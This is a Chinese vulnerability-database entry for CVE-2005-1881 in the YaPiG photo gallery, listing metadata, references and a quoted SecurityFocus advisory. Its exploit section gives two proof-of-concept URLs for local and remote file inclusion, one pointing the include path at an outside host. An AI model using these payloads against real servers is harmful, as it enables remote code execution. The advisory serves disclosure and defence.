YaPiG upload.php脚本 php任意代码执行漏洞

YaPiG upload.php脚本 php任意代码执行漏洞

漏洞ID 1108842 漏洞类型 未知
发布时间 2005-06-06 更新时间 2005-06-06
图片[1]-YaPiG upload.php脚本 php任意代码执行漏洞-安全小百科CVE编号 CVE-2005-1881
图片[2]-YaPiG upload.php脚本 php任意代码执行漏洞-安全小百科CNNVD-ID CNNVD-200506-038
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25792
https://www.securityfocus.com/bid/89869
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-038
|漏洞详情
YaPiG0.92b,0.93u和0.94u版本中的upload.php脚本没有正确地对上传图像文件的扩展名加以限制,导致远程攻击者可以上传任意文件并执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/13874/info

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. 

Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/
|受影响的产品
YaPiG YaPig 0.94U

YaPiG YaPig 0.93U

YaPiG YaPig 0.92B

|参考资料

来源:OSVDB
名称:17115
链接:http://www.osvdb.org/17115
来源:MISC
链接:http://secwatch.org/advisories/secwatch/20050530_yapig.txt
来源:SECTRACK
名称:1014103
链接:http://securitytracker.com/id?1014103
来源:SECUNIA
名称:15600
链接:http://secunia.com/advisories/15600/

相关推荐: OpenBSD User Mode Return Value Denial Of Service Vulnerability

OpenBSD User Mode Return Value Denial Of Service Vulnerability 漏洞ID 1102743 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享